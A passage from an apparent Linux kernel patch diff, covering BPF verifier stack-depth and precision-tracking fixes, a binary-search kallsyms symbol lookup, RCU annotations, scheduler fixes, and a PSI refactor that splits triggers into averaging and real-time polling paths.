+ 			return -EFAULT;
+ 		}
+-		if (subprog[idx].is_async_cb) {
+-			if (subprog[idx].has_tail_call) {
++		if (subprog[sidx].is_async_cb) {
++			if (subprog[sidx].has_tail_call) {
+ 				verbose(env, "verifier bug. subprog has tail_call and async cb\n");
+ 				return -EFAULT;
+ 			}
+@@ -4362,6 +4519,7 @@ continue_func:
+ 				continue;
+ 		}
+ 		i = next_insn;
++		idx = sidx;
+ 
+ 		if (subprog[idx].has_tail_call)
+ 			tail_call_reachable = true;
+@@ -4397,6 +4555,22 @@ continue_func:
+ 	goto continue_func;
+ }
+ 
++static int check_max_stack_depth(struct bpf_verifier_env *env)
++{
++	struct bpf_subprog_info *si = env->subprog_info;
++	int ret;
++
++	for (int i = 0; i < env->subprog_cnt; i++) {
++		if (!i || si[i].is_async_cb) {
++			ret = check_max_stack_depth_subprog(env, i);
++			if (ret < 0)
++				return ret;
++		}
++		continue;
++	}
++	return 0;
++}
++
+ #ifndef CONFIG_BPF_JIT_ALWAYS_ON
+ static int get_callee_stack_depth(struct bpf_verifier_env *env,
+ 				  const struct bpf_insn *insn, int idx)
+@@ -6714,6 +6888,10 @@ typedef int (*set_callee_state_fn)(struct bpf_verifier_env *env,
+ 				   struct bpf_func_state *callee,
+ 				   int insn_idx);
+ 
++static int set_callee_state(struct bpf_verifier_env *env,
++			    struct bpf_func_state *caller,
++			    struct bpf_func_state *callee, int insn_idx);
++
+ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 			     int *insn_idx, int subprog,
+ 			     set_callee_state_fn set_callee_state_cb)
+@@ -6764,6 +6942,16 @@ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn
+ 		}
+ 	}
+ 
++	/* set_callee_state is used for direct subprog calls, but we are
++	 * interested in validating only BPF helpers that can call subprogs as
++	 * callbacks
++	 */
++	if (set_callee_state_cb != set_callee_state && !is_callback_calling_function(insn->imm)) {
++		verbose(env, "verifier bug: helper %s#%d is not marked as callback-calling\n",
++			func_id_name(insn->imm), insn->imm);
++		return -EFAULT;
++	}
++
+ 	if (insn->code == (BPF_JMP | BPF_CALL) &&
+ 	    insn->src_reg == 0 &&
+ 	    insn->imm == BPF_FUNC_timer_set_callback) {
+@@ -11592,7 +11780,7 @@ static bool regsafe(struct bpf_verifier_env *env, struct bpf_reg_state *rold,
+ 		if (env->explore_alu_limits)
+ 			return false;
+ 		if (rcur->type == SCALAR_VALUE) {
+-			if (!rold->precise && !rcur->precise)
++			if (!rold->precise)
+ 				return true;
+ 			/* new val must satisfy old val knowledge */
+ 			return range_within(rold, rcur) &&
+@@ -12141,6 +12329,10 @@ next:
+ 	env->prev_jmps_processed = env->jmps_processed;
+ 	env->prev_insn_processed = env->insn_processed;
+ 
++	/* forget precise markings we inherited, see __mark_chain_precision */
++	if (env->bpf_capable)
++		mark_all_scalars_imprecise(env, cur);
++
+ 	/* add new state to the head of linked list */
+ 	new = &new_sl->state;
+ 	err = copy_verifier_state(new, cur);
+@@ -14695,6 +14887,8 @@ static int do_check_common(struct bpf_verifier_env *env, int subprog)
+ 			BPF_MAIN_FUNC /* callsite */,
+ 			0 /* frameno */,
+ 			subprog);
++	state->first_insn_idx = env->subprog_info[subprog].start;
++	state->last_insn_idx = -1;
+ 
+ 	regs = state->frame[state->curframe]->regs;
+ 	if (subprog || env->prog->type == BPF_PROG_TYPE_EXT) {
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 2380c4daef33d..73f11e4db3a4d 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -3771,7 +3771,7 @@ static ssize_t pressure_write(struct kernfs_open_file *of, char *buf,
+ 	}
+ 
+ 	psi = cgroup_psi(cgrp);
+-	new = psi_trigger_create(psi, buf, res);
++	new = psi_trigger_create(psi, buf, res, of->file, of);
+ 	if (IS_ERR(new)) {
+ 		cgroup_put(cgrp);
+ 		return PTR_ERR(new);
+diff --git a/kernel/kallsyms.c b/kernel/kallsyms.c
+index 60c20f301a6ba..676328a7c8c75 100644
+--- a/kernel/kallsyms.c
++++ b/kernel/kallsyms.c
+@@ -174,11 +174,10 @@ static bool cleanup_symbol_name(char *s)
+ 	 * LLVM appends various suffixes for local functions and variables that
+ 	 * must be promoted to global scope as part of LTO.  This can break
+ 	 * hooking of static functions with kprobes. '.' is not a valid
+-	 * character in an identifier in C. Suffixes observed:
++	 * character in an identifier in C. Suffixes only in LLVM LTO observed:
+ 	 * - foo.llvm.[0-9a-f]+
+-	 * - foo.[0-9a-f]+
+ 	 */
+-	res = strchr(s, '.');
++	res = strstr(s, ".llvm.");
+ 	if (res) {
+ 		*res = '\0';
+ 		return true;
+@@ -187,26 +186,90 @@ static bool cleanup_symbol_name(char *s)
+ 	return false;
+ }
+ 
++static int compare_symbol_name(const char *name, char *namebuf)
++{
++	int ret;
++
++	ret = strcmp(name, namebuf);
++	if (!ret)
++		return ret;
++
++	if (cleanup_symbol_name(namebuf) && !strcmp(name, namebuf))
++		return 0;
++
++	return ret;
++}
++
++static int kallsyms_lookup_names(const char *name,
++				 unsigned int *start,
++				 unsigned int *end)
++{
++	int ret;
++	int low, mid, high;
++	unsigned int seq, off;
++	char namebuf[KSYM_NAME_LEN];
++
++	low = 0;
++	high = kallsyms_num_syms - 1;
++
++	while (low <= high) {
++		mid = low + (high - low) / 2;
++		seq = kallsyms_seqs_of_names[mid];
++		off = get_symbol_offset(seq);
++		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
++		ret = compare_symbol_name(name, namebuf);
++		if (ret > 0)
++			low = mid + 1;
++		else if (ret < 0)
++			high = mid - 1;
++		else
++			break;
++	}
++
++	if (low > high)
++		return -ESRCH;
++
++	low = mid;
++	while (low) {
++		seq = kallsyms_seqs_of_names[low - 1];
++		off = get_symbol_offset(seq);
++		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
++		if (compare_symbol_name(name, namebuf))
++			break;
++		low--;
++	}
++	*start = low;
++
++	if (end) {
++		high = mid;
++		while (high < kallsyms_num_syms - 1) {
++			seq = kallsyms_seqs_of_names[high + 1];
++			off = get_symbol_offset(seq);
++			kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
++			if (compare_symbol_name(name, namebuf))
++				break;
++			high++;
++		}
++		*end = high;
++	}
++
++	return 0;
++}
++
+ /* Lookup the address for this symbol. Returns 0 if not found. */
+ unsigned long kallsyms_lookup_name(const char *name)
+ {
+-	char namebuf[KSYM_NAME_LEN];
+-	unsigned long i;
+-	unsigned int off;
++	int ret;
++	unsigned int i;
+ 
+ 	/* Skip the search for empty string. */
+ 	if (!*name)
+ 		return 0;
+ 
+-	for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
+-		off = kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+-
+-		if (strcmp(namebuf, name) == 0)
+-			return kallsyms_sym_address(i);
++	ret = kallsyms_lookup_names(name, &i, NULL);
++	if (!ret)
++		return kallsyms_sym_address(kallsyms_seqs_of_names[i]);
+ 
+-		if (cleanup_symbol_name(namebuf) && strcmp(namebuf, name) == 0)
+-			return kallsyms_sym_address(i);
+-	}
+ 	return module_kallsyms_lookup_name(name);
+ }
+ 
+diff --git a/kernel/kallsyms_internal.h b/kernel/kallsyms_internal.h
+index 2d0c6f2f0243a..a04b7a5cb1e3e 100644
+--- a/kernel/kallsyms_internal.h
++++ b/kernel/kallsyms_internal.h
+@@ -26,5 +26,6 @@ extern const char kallsyms_token_table[] __weak;
+ extern const u16 kallsyms_token_index[] __weak;
+ 
+ extern const unsigned int kallsyms_markers[] __weak;
++extern const unsigned int kallsyms_seqs_of_names[] __weak;
+ 
+ #endif // LINUX_KALLSYMS_INTERNAL_H_
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index df968321feada..c1f18c63b9b14 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -233,7 +233,6 @@ static void cblist_init_generic(struct rcu_tasks *rtp)
+ 	if (rcu_task_enqueue_lim < 0) {
+ 		rcu_task_enqueue_lim = 1;
+ 		rcu_task_cb_adjust = true;
+-		pr_info("%s: Setting adjustable number of callback queues.\n", __func__);
+ 	} else if (rcu_task_enqueue_lim == 0) {
+ 		rcu_task_enqueue_lim = 1;
+ 	}
+@@ -264,6 +263,10 @@ static void cblist_init_generic(struct rcu_tasks *rtp)
+ 		raw_spin_unlock_rcu_node(rtpcp); // irqs remain disabled.
+ 	}
+ 	raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
++
++	if (rcu_task_cb_adjust)
++		pr_info("%s: Setting adjustable number of callback queues.\n", __func__);
++
+ 	pr_info("%s: Setting shift to %d and lim to %d.\n", __func__, data_race(rtp->percpu_enqueue_shift), data_race(rtp->percpu_enqueue_lim));
+ }
+ 
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index e25321dbb068e..aa3ec3c3b9f75 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -641,7 +641,7 @@ static void synchronize_rcu_expedited_wait(void)
+ 					"O."[!!cpu_online(cpu)],
+ 					"o."[!!(rdp->grpmask & rnp->expmaskinit)],
+ 					"N."[!!(rdp->grpmask & rnp->expmaskinitnext)],
+-					"D."[!!(rdp->cpu_no_qs.b.exp)]);
++					"D."[!!data_race(rdp->cpu_no_qs.b.exp)]);
+ 			}
+ 		}
+ 		pr_cont(" } %lu jiffies s: %lu root: %#lx/%c\n",
+diff --git a/kernel/rcu/tree_plugin.h b/kernel/rcu/tree_plugin.h
+index e3142ee35fc6a..044026abfdd7f 100644
+--- a/kernel/rcu/tree_plugin.h
++++ b/kernel/rcu/tree_plugin.h
+@@ -257,6 +257,8 @@ static void rcu_preempt_ctxt_queue(struct rcu_node *rnp, struct rcu_data *rdp)
+ 	 * GP should not be able to end until we report, so there should be
+ 	 * no need to check for a subsequent expedited GP.  (Though we are
+ 	 * still in a quiescent state in any case.)
++	 *
++	 * Interrupts are disabled, so ->cpu_no_qs.b.exp cannot change.
+ 	 */
+ 	if (blkd_state & RCU_EXP_BLKD && rdp->cpu_no_qs.b.exp)
+ 		rcu_report_exp_rdp(rdp);
+@@ -941,7 +943,7 @@ notrace void rcu_preempt_deferred_qs(struct task_struct *t)
+ {
+ 	struct rcu_data *rdp = this_cpu_ptr(&rcu_data);
+ 
+-	if (rdp->cpu_no_qs.b.exp)
++	if (READ_ONCE(rdp->cpu_no_qs.b.exp))
+ 		rcu_report_exp_rdp(rdp);
+ }
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index fa33c441ae867..5e5aea2360a87 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6935,7 +6935,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	    recent_used_cpu != target &&
+ 	    cpus_share_cache(recent_used_cpu, target) &&
+ 	    (available_idle_cpu(recent_used_cpu) || sched_idle_cpu(recent_used_cpu)) &&
+-	    cpumask_test_cpu(p->recent_used_cpu, p->cpus_ptr) &&
++	    cpumask_test_cpu(recent_used_cpu, p->cpus_ptr) &&
+ 	    asym_fits_cpu(task_util, util_min, util_max, recent_used_cpu)) {
+ 		return recent_used_cpu;
+ 	}
+@@ -10556,7 +10556,7 @@ static int load_balance(int this_cpu, struct rq *this_rq,
+ 		.sd		= sd,
+ 		.dst_cpu	= this_cpu,
+ 		.dst_rq		= this_rq,
+-		.dst_grpmask    = sched_group_span(sd->groups),
++		.dst_grpmask    = group_balance_mask(sd->groups),
+ 		.idle		= idle,
+ 		.loop_break	= SCHED_NR_MIGRATE_BREAK,
+ 		.cpus		= cpus,
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index e83c321461cf4..80d8c10e93638 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -186,17 +186,22 @@ static void group_init(struct psi_group *group)
+ 		seqcount_init(&per_cpu_ptr(group->pcpu, cpu)->seq);
+ 	group->avg_last_update = sched_clock();
+ 	group->avg_next_update = group->avg_last_update + psi_period;
+-	INIT_DELAYED_WORK(&group->avgs_work, psi_avgs_work);
+ 	mutex_init(&group->avgs_lock);
+-	/* Init trigger-related members */
+-	atomic_set(&group->poll_scheduled, 0);
+-	mutex_init(&group->trigger_lock);
+-	INIT_LIST_HEAD(&group->triggers);
+-	group->poll_min_period = U32_MAX;
+-	group->polling_next_update = ULLONG_MAX;
+-	init_waitqueue_head(&group->poll_wait);
+-	timer_setup(&group->poll_timer, poll_timer_fn, 0);
+-	rcu_assign_pointer(group->poll_task, NULL);
++
++	/* Init avg trigger-related members */
++	INIT_LIST_HEAD(&group->avg_triggers);
++	memset(group->avg_nr_triggers, 0, sizeof(group->avg_nr_triggers));
++	INIT_DELAYED_WORK(&group->avgs_work, psi_avgs_work);
++
++	/* Init rtpoll trigger-related members */
++	atomic_set(&group->rtpoll_scheduled, 0);
++	mutex_init(&group->rtpoll_trigger_lock);
++	INIT_LIST_HEAD(&group->rtpoll_triggers);
++	group->rtpoll_min_period = U32_MAX;
++	group->rtpoll_next_update = ULLONG_MAX;
++	init_waitqueue_head(&group->rtpoll_wait);
++	timer_setup(&group->rtpoll_timer, poll_timer_fn, 0);
++	rcu_assign_pointer(group->rtpoll_task, NULL);
+ }
+ 
+ void __init psi_init(void)
+@@ -243,6 +248,8 @@ static void get_recent_times(struct psi_group *group, int cpu,
+ 			     u32 *pchanged_states)
+ {
+ 	struct psi_group_cpu *groupc = per_cpu_ptr(group->pcpu, cpu);
++	int current_cpu = raw_smp_processor_id();
++	unsigned int tasks[NR_PSI_TASK_COUNTS];
+ 	u64 now, state_start;
+ 	enum psi_states s;
+ 	unsigned int seq;
+@@ -257,6 +264,8 @@ static void get_recent_times(struct psi_group *group, int cpu,
+ 		memcpy(times, groupc->times, sizeof(groupc->times));
+ 		state_mask = groupc->state_mask;
+ 		state_start = groupc->state_start;
++		if (cpu == current_cpu)
++			memcpy(tasks, groupc->tasks, sizeof(groupc->tasks));
+ 	} while (read_seqcount_retry(&groupc->seq, seq));
+ 
+ 	/* Calculate state time deltas against the previous snapshot */
+@@ -281,6 +290,28 @@ static void get_recent_times(struct psi_group *group, int cpu,
+ 		if (delta)
+ 			*pchanged_states |= (1 << s);
+ 	}
++
++	/*
++	 * When collect_percpu_times() from the avgs_work, we don't want to
++	 * re-arm avgs_work when all CPUs are IDLE. But the current CPU running
++	 * this avgs_work is never IDLE, cause avgs_work can't be shut off.
++	 * So for the current CPU, we need to re-arm avgs_work only when
++	 * (NR_RUNNING > 1 || NR_IOWAIT > 0 || NR_MEMSTALL > 0), for other CPUs
++	 * we can just check PSI_NONIDLE delta.
++	 */
++	if (current_work() == &group->avgs_work.work) {
++		bool reschedule;
++
++		if (cpu == current_cpu)
++			reschedule = tasks[NR_RUNNING] +
++				     tasks[NR_IOWAIT] +
++				     tasks[NR_MEMSTALL] > 1;
++		else
++			reschedule = *pchanged_states & (1 << PSI_NONIDLE);
++
++		if (reschedule)
++			*pchanged_states |= PSI_STATE_RESCHEDULE;
++	}
+ }
+ 
+ static void calc_avgs(unsigned long avg[3], int missed_periods,
+@@ -358,94 +389,6 @@ static void collect_percpu_times(struct psi_group *group,
+ 		*pchanged_states = changed_states;
+ }
+ 
+-static u64 update_averages(struct psi_group *group, u64 now)
+-{
+-	unsigned long missed_periods = 0;
+-	u64 expires, period;
+-	u64 avg_next_update;
+-	int s;
+-
+-	/* avgX= */
+-	expires = group->avg_next_update;
+-	if (now - expires >= psi_period)
+-		missed_periods = div_u64(now - expires, psi_period);
+-
+-	/*
+-	 * The periodic clock tick can get delayed for various
+-	 * reasons, especially on loaded systems. To avoid clock
+-	 * drift, we schedule the clock in fixed psi_period intervals.
+-	 * But the deltas we sample out of the per-cpu buckets above
+-	 * are based on the actual time elapsing between clock ticks.
+-	 */
+-	avg_next_update = expires + ((1 + missed_periods) * psi_period);
+-	period = now - (group->avg_last_update + (missed_periods * psi_period));
+-	group->avg_last_update = now;
+-
+-	for (s = 0; s < NR_PSI_STATES - 1; s++) {
+-		u32 sample;
+-
+-		sample = group->total[PSI_AVGS][s] - group->avg_total[s];
+-		/*
+-		 * Due to the lockless sampling of the time buckets,
+-		 * recorded time deltas can slip into the next period,
+-		 * which under full pressure can result in samples in
+-		 * excess of the period length.
+-		 *
+-		 * We don't want to report non-sensical pressures in
+-		 * excess of 100%, nor do we want to drop such events
+-		 * on the floor. Instead we punt any overage into the
+-		 * future until pressure subsides. By doing this we
+-		 * don't underreport the occurring pressure curve, we
+-		 * just report it delayed by one period length.
+-		 *
+-		 * The error isn't cumulative. As soon as another
+-		 * delta slips from a period P to P+1, by definition
+-		 * it frees up its time T in P.
+-		 */
+-		if (sample > period)
+-			sample = period;
+-		group->avg_total[s] += sample;
+-		calc_avgs(group->avg[s], missed_periods, sample, period);
+-	}
+-
+-	return avg_next_update;
+-}
+-
+-static void psi_avgs_work(struct work_struct *work)
+-{
+-	struct delayed_work *dwork;
+-	struct psi_group *group;
+-	u32 changed_states;
+-	bool nonidle;
+-	u64 now;
+-
+-	dwork = to_delayed_work(work);
+-	group = container_of(dwork, struct psi_group, avgs_work);
+-
+-	mutex_lock(&group->avgs_lock);
+-
+-	now = sched_clock();
+-
+-	collect_percpu_times(group, PSI_AVGS, &changed_states);
+-	nonidle = changed_states & (1 << PSI_NONIDLE);
+-	/*
+-	 * If there is task activity, periodically fold the per-cpu
+-	 * times and feed samples into the running averages. If things
+-	 * are idle and there is no data to process, stop the clock.
+-	 * Once restarted, we'll catch up the running averages in one
+-	 * go - see calc_avgs() and missed_periods.
+-	 */
+-	if (now >= group->avg_next_update)
+-		group->avg_next_update = update_averages(group, now);
+-
+-	if (nonidle) {
+-		schedule_delayed_work(dwork, nsecs_to_jiffies(
+-				group->avg_next_update - now) + 1);
+-	}
+-
+-	mutex_unlock(&group->avgs_lock);
+-}
+-
+ /* Trigger tracking window manipulations */
+ static void window_reset(struct psi_window *win, u64 now, u64 value,
+ 			 u64 prev_growth)
+@@ -492,33 +435,32 @@ static u64 window_update(struct psi_window *win, u64 now, u64 value)
+ 	return growth;
+ }
+ 
+-static void init_triggers(struct psi_group *group, u64 now)
++static u64 update_triggers(struct psi_group *group, u64 now, bool *update_total,
++						   enum psi_aggregators aggregator)
+ {
+ 	struct psi_trigger *t;
+-
+-	list_for_each_entry(t, &group->triggers, node)
+-		window_reset(&t->win, now,
+-				group->total[PSI_POLL][t->state], 0);
+-	memcpy(group->polling_total, group->total[PSI_POLL],
+-		   sizeof(group->polling_total));
+-	group->polling_next_update = now + group->poll_min_period;
+-}
+-
+-static u64 update_triggers(struct psi_group *group, u64 now)
+-{
+-	struct psi_trigger *t;
+-	bool update_total = false;
+-	u64 *total = group->total[PSI_POLL];
++	u64 *total = group->total[aggregator];
++	struct list_head *triggers;
++	u64 *aggregator_total;
++	*update_total = false;
++
++	if (aggregator == PSI_AVGS) {
++		triggers = &group->avg_triggers;
++		aggregator_total = group->avg_total;
++	} else {
++		triggers = &group->rtpoll_triggers;
++		aggregator_total = group->rtpoll_total;
++	}
+ 
+ 	/*
+ 	 * On subsequent updates, calculate growth deltas and let
+ 	 * watchers know when their specified thresholds are exceeded.
+ 	 */
+-	list_for_each_entry(t, &group->triggers, node) {
++	list_for_each_entry(t, triggers, node) {
+ 		u64 growth;
+ 		bool new_stall;
+ 
+-		new_stall = group->polling_total[t->state] != total[t->state];
++		new_stall = aggregator_total[t->state] != total[t->state];
+ 
+ 		/* Check for stall activity or a previous threshold breach */
+ 		if (!new_stall && !t->pending_event)
+@@ -536,7 +478,7 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 			 * been through all of them. Also remember to extend the
+ 			 * polling time if we see new stall activity.
+ 			 */
+-			update_total = true;
++			*update_total = true;
+ 
+ 			/* Calculate growth since last update */
+ 			growth = window_update(&t->win, now, total[t->state]);
+@@ -552,59 +494,161 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 			continue;
+ 
+ 		/* Generate an event */
+-		if (cmpxchg(&t->event, 0, 1) == 0)
+-			wake_up_interruptible(&t->event_wait);
++		if (cmpxchg(&t->event, 0, 1) == 0) {
++			if (t->of)
++				kernfs_notify(t->of->kn);
++			else
++				wake_up_interruptible(&t->event_wait);
++		}
+ 		t->last_event_time = now;
+ 		/* Reset threshold breach flag once event got generated */
+ 		t->pending_event = false;
+ 	}
+ 
+-	if (update_total)
+-		memcpy(group->polling_total, total,
+-				sizeof(group->polling_total));
++	return now + group->rtpoll_min_period;
++}
++
++static u64 update_averages(struct psi_group *group, u64 now)
++{
++	unsigned long missed_periods = 0;
++	u64 expires, period;
++	u64 avg_next_update;
++	int s;
++
++	/* avgX= */
++	expires = group->avg_next_update;
++	if (now - expires >= psi_period)
++		missed_periods = div_u64(now - expires, psi_period);
++
++	/*
++	 * The periodic clock tick can get delayed for various
++	 * reasons, especially on loaded systems. To avoid clock
++	 * drift, we schedule the clock in fixed psi_period intervals.
++	 * But the deltas we sample out of the per-cpu buckets above
++	 * are based on the actual time elapsing between clock ticks.
++	 */
++	avg_next_update = expires + ((1 + missed_periods) * psi_period);
++	period = now - (group->avg_last_update + (missed_periods * psi_period));
++	group->avg_last_update = now;
++
++	for (s = 0; s < NR_PSI_STATES - 1; s++) {
++		u32 sample;
++
++		sample = group->total[PSI_AVGS][s] - group->avg_total[s];
++		/*
++		 * Due to the lockless sampling of the time buckets,
++		 * recorded time deltas can slip into the next period,
++		 * which under full pressure can result in samples in
++		 * excess of the period length.
++		 *
++		 * We don't want to report non-sensical pressures in
++		 * excess of 100%, nor do we want to drop such events
++		 * on the floor. Instead we punt any overage into the
++		 * future until pressure subsides. By doing this we
++		 * don't underreport the occurring pressure curve, we
++		 * just report it delayed by one period length.
++		 *
++		 * The error isn't cumulative. As soon as another
++		 * delta slips from a period P to P+1, by definition
++		 * it frees up its time T in P.
++		 */
++		if (sample > period)
++			sample = period;
++		group->avg_total[s] += sample;
++		calc_avgs(group->avg[s], missed_periods, sample, period);
++	}
++
++	return avg_next_update;
++}
++
++static void psi_avgs_work(struct work_struct *work)
++{
++	struct delayed_work *dwork;
++	struct psi_group *group;
++	u32 changed_states;
++	bool update_total;
++	u64 now;
+ 
+-	return now + group->poll_min_period;
++	dwork = to_delayed_work(work);
++	group = container_of(dwork, struct psi_group, avgs_work);
++
++	mutex_lock(&group->avgs_lock);
++
++	now = sched_clock();
++
++	collect_percpu_times(group, PSI_AVGS, &changed_states);
++	/*
++	 * If there is task activity, periodically fold the per-cpu
++	 * times and feed samples into the running averages. If things
++	 * are idle and there is no data to process, stop the clock.
++	 * Once restarted, we'll catch up the running averages in one
++	 * go - see calc_avgs() and missed_periods.
++	 */
++	if (now >= group->avg_next_update) {
++		update_triggers(group, now, &update_total, PSI_AVGS);
++		group->avg_next_update = update_averages(group, now);
++	}
++
++	if (changed_states & PSI_STATE_RESCHEDULE) {
++		schedule_delayed_work(dwork, nsecs_to_jiffies(
++				group->avg_next_update - now) + 1);
++	}
++
++	mutex_unlock(&group->avgs_lock);
++}
++
++static void init_rtpoll_triggers(struct psi_group *group, u64 now)
++{
++	struct psi_trigger *t;
++
++	list_for_each_entry(t, &group->rtpoll_triggers, node)
++		window_reset(&t->win, now,
++				group->total[PSI_POLL][t->state], 0);
++	memcpy(group->rtpoll_total, group->total[PSI_POLL],
++		   sizeof(group->rtpoll_total));
++	group->rtpoll_next_update = now + group->rtpoll_min_period;
+ }
+ 
+ /* Schedule polling if it's not already scheduled or forced. */
+-static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay,
++static void psi_schedule_rtpoll_work(struct psi_group *group, unsigned long delay,
+ 				   bool force)
+ {
+ 	struct task_struct *task;
+ 
+ 	/*
+ 	 * atomic_xchg should be called even when !force to provide a
+-	 * full memory barrier (see the comment inside psi_poll_work).
++	 * full memory barrier (see the comment inside psi_rtpoll_work).
+ 	 */
+-	if (atomic_xchg(&group->poll_scheduled, 1) && !force)
++	if (atomic_xchg(&group->rtpoll_scheduled, 1) && !force)
+ 		return;
+ 
+ 	rcu_read_lock();
+ 
+-	task = rcu_dereference(group->poll_task);
++	task = rcu_dereference(group->rtpoll_task);
+ 	/*
+ 	 * kworker might be NULL in case psi_trigger_destroy races with
+ 	 * psi_task_change (hotpath) which can't use locks
+ 	 */
+ 	if (likely(task))
+-		mod_timer(&group->poll_timer, jiffies + delay);
++		mod_timer(&group->rtpoll_timer, jiffies + delay);
+ 	else
+-		atomic_set(&group->poll_scheduled, 0);
++		atomic_set(&group->rtpoll_scheduled, 0);
+ 
+ 	rcu_read_unlock();
+ }
+ 
+-static void psi_poll_work(struct psi_group *group)
++static void psi_rtpoll_work(struct psi_group *group)
+ {
+ 	bool force_reschedule = false;
+ 	u32 changed_states;
++	bool update_total;
+ 	u64 now;
+ 
+-	mutex_lock(&group->trigger_lock);
++	mutex_lock(&group->rtpoll_trigger_lock);
+ 
+ 	now = sched_clock();
+ 
+-	if (now > group->polling_until) {
++	if (now > group->rtpoll_until) {
+ 		/*
+ 		 * We are either about to start or might stop polling if no
+ 		 * state change was recorded. Resetting poll_scheduled leaves
+@@ -614,7 +658,7 @@ static void psi_poll_work(struct psi_group *group)
+ 		 * should be negligible and polling_next_update still keeps
+ 		 * updates correctly on schedule.
+ 		 */
+-		atomic_set(&group->poll_scheduled, 0);
++		atomic_set(&group->rtpoll_scheduled, 0);
+ 		/*
+ 		 * A task change can race with the poll worker that is supposed to
+ 		 * report on it. To avoid missing events, ensure ordering between
+@@ -643,60 +687,64 @@ static void psi_poll_work(struct psi_group *group)
+ 
+ 	collect_percpu_times(group, PSI_POLL, &changed_states);
+ 
+-	if (changed_states & group->poll_states) {
++	if (changed_states & group->rtpoll_states) {
+ 		/* Initialize trigger windows when entering polling mode */
+-		if (now > group->polling_until)
+-			init_triggers(group, now);
++		if (now > group->rtpoll_until)
++			init_rtpoll_triggers(group, now);
+ 
+ 		/*
+ 		 * Keep the monitor active for at least the duration of the
+ 		 * minimum tracking window as long as monitor states are
+ 		 * changing.
+ 		 */
+-		group->polling_until = now +
+-			group->poll_min_period * UPDATES_PER_WINDOW;
++		group->rtpoll_until = now +
++			group->rtpoll_min_period * UPDATES_PER_WINDOW;
+ 	}
+ 
+-	if (now > group->polling_until) {
+-		group->polling_next_update = ULLONG_MAX;
++	if (now > group->rtpoll_until) {
++		group->rtpoll_next_update = ULLONG_MAX;
+ 		goto out;
+ 	}
+ 
+-	if (now >= group->polling_next_update)
+-		group->polling_next_update = update_triggers(group, now);
++	if (now >= group->rtpoll_next_update) {
++		group->rtpoll_next_update = update_triggers(group, now, &update_total, PSI_POLL);
++		if (update_total)
++			memcpy(group->rtpoll_total, group->total[PSI_POLL],
++				   sizeof(group->rtpoll_total));
++	}
+ 
+-	psi_schedule_poll_work(group,
+-		nsecs_to_jiffies(group->polling_next_update - now) + 1,
++	psi_schedule_rtpoll_work(group,
++		nsecs_to_jiffies(group->rtpoll_next_update - now) + 1,
+ 		force_reschedule);
+ 
+ out:
+-	mutex_unlock(&group->trigger_lock);
++	mutex_unlock(&group->rtpoll_trigger_lock);
+ }
+ 
+-static int psi_poll_worker(void *data)
++static int psi_rtpoll_worker(void *data)
+ {
+ 	struct psi_group *group = (struct psi_group *)data;
+ 
+ 	sched_set_fifo_low(current);
+ 
+ 	while (true) {
+-		wait_event_interruptible(group->poll_wait,
+-				atomic_cmpxchg(&group->poll_wakeup, 1, 0) ||
++		wait_event_interruptible(group->rtpoll_wait,
++				atomic_cmpxchg(&group->rtpoll_wakeup, 1, 0) ||
+ 				kthread_should_stop());
+ 		if (kthread_should_stop())
+ 			break;
+ 
+-		psi_poll_work(group);
++		psi_rtpoll_work(group);
+ 	}
+ 	return 0;
+ }
+ 
+ static void poll_timer_fn(struct timer_list *t)
+ {
+-	struct psi_group *group = from_timer(group, t, poll_timer);
++	struct psi_group *group = from_timer(group, t, rtpoll_timer);
+ 
+-	atomic_set(&group->poll_wakeup, 1);
+-	wake_up_interruptible(&group->poll_wait);
++	atomic_set(&group->rtpoll_wakeup, 1);
++	wake_up_interruptible(&group->rtpoll_wait);
+ }
+ 
+ static void record_times(struct psi_group_cpu *groupc, u64 now)
+@@ -827,8 +875,8 @@ static void psi_group_change(struct psi_group *group, int cpu,
+ 
+ 	write_seqcount_end(&groupc->seq);
+ 
+-	if (state_mask & group->poll_states)
+-		psi_schedule_poll_work(group, 1, false);
++	if (state_mask & group->rtpoll_states)
++		psi_schedule_rtpoll_work(group, 1, false);
+ 
+ 	if (wake_clock && !delayed_work_pending(&group->avgs_work))
+ 		schedule_delayed_work(&group->avgs_work, PSI_FREQ);
+@@ -981,8 +1029,8 @@ void psi_account_irqtime(struct task_struct *task, u32 delta)
+ 
+ 		write_seqcount_end(&groupc->seq);
+ 
+-		if (group->poll_states & (1 << PSI_IRQ_FULL))
+-			psi_schedule_poll_work(group, 1, false);
++		if (group->rtpoll_states & (1 << PSI_IRQ_FULL))
++			psi_schedule_rtpoll_work(group, 1, false);
+ 	} while ((group = group->parent));
+ }
+ #endif
+@@ -1077,7 +1125,7 @@ void psi_cgroup_free(struct cgroup *cgroup)
+ 	cancel_delayed_work_sync(&cgroup->psi->avgs_work);
+ 	free_percpu(cgroup->psi->pcpu);
+ 	/* All triggers must be removed by now */
+-	WARN_ONCE(cgroup->psi->poll_states, "psi: trigger leak\n");
++	WARN_ONCE(cgroup->psi->rtpoll_states, "psi: trigger leak\n");
+ 	kfree(cgroup->psi);
+ }
+ 
